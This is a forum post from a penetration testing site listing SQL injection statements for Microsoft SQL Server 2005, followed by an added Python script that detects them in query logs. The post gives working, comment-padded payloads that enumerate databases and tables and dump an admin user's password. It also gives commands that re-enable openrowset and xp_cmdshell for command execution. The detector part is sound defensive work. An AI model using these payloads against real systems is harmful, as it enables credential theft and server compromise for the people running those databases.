China Network Penetration Testing Alliance
Title: MSsql2005 injection statements
Author: admin
Time: 2012-9-13 17:19

CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

Table enumeration statement. The somedb part is the database whose tables are to be listed; the number 1 shown in red is incremented each time.

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

Column dump statement. It dumps the password field of the row in table admin where user='icerover'.

CODE:
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

In MSSQL 2005, xp_cmdshell is not enabled by default, and openrowset cannot be used either.
With sa privileges, they can be enabled as follows.

Enable openrowset

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

Enable xp_cmdshell

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok, over~~ good night
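
A defender-side check for the statements above, as an added example that is not part of the original post: it normalizes logged query strings (percent-decoding, /**/ padding replaced by spaces) and flags the three statement families shown. The rule names, the padding threshold, the `id` parameter and the sample queries are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Constructed rules, one per statement family in the post.
RULES = {
    "catalog-enumeration": re.compile(
        r"\bsysdatabases\b|\bsys\s*\.\s*all_objects\b", re.I),
    "error-based-cast": re.compile(
        r"\bselect\s+top\s+1\b.*\bcast\s*\(.*\)\s*=\s*0\s*--", re.I | re.S),
    "sp_configure-enable": re.compile(
        r"\bsp_configure\s+'(show\s+advanced\s+options|"
        r"ad\s+hoc\s+distributed\s+queries|xp_cmdshell)'\s*,\s*1\b", re.I),
}

def normalize(query: str) -> str:
    """Percent-decode, then collapse /**/ padding and whitespace to one space."""
    decoded = unquote_plus(query)
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", decoded)).strip()

def classify(query: str) -> list[str]:
    """Return the names of all rules that match one logged query string."""
    decoded = unquote_plus(query)
    hits = [name for name, rule in RULES.items() if rule.search(normalize(query))]
    # Empty comments used as whitespace are rare in legitimate traffic.
    if len(re.findall(r"/\*\s*\*/", decoded)) >= 3:
        hits.append("comment-padding")
    return sorted(hits)

# Constructed query strings; the parameter name "id" is hypothetical.
SAMPLE_QUERIES = [
    "id=12&page=2",
    "id=12/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))"
    "/**/from/**/somedb.sys.all_objects/**/order/**/by/**/name)%3d0--",
    "id=12;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--",
    "q=select+top+1+seller&sort=cast",
]

def scan(queries: list[str]) -> dict[int, list[str]]:
    """Map the index of each suspicious query to its matched rule names."""
    results = {i: classify(q) for i, q in enumerate(queries)}
    return {i: hits for i, hits in results.items() if hits}

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_QUERIES).items():
        print(index, hits)
```

The rules only match after normalization, which is why matching raw log text for `sp_configure 'xp_cmdshell'` misses the padded form.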

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)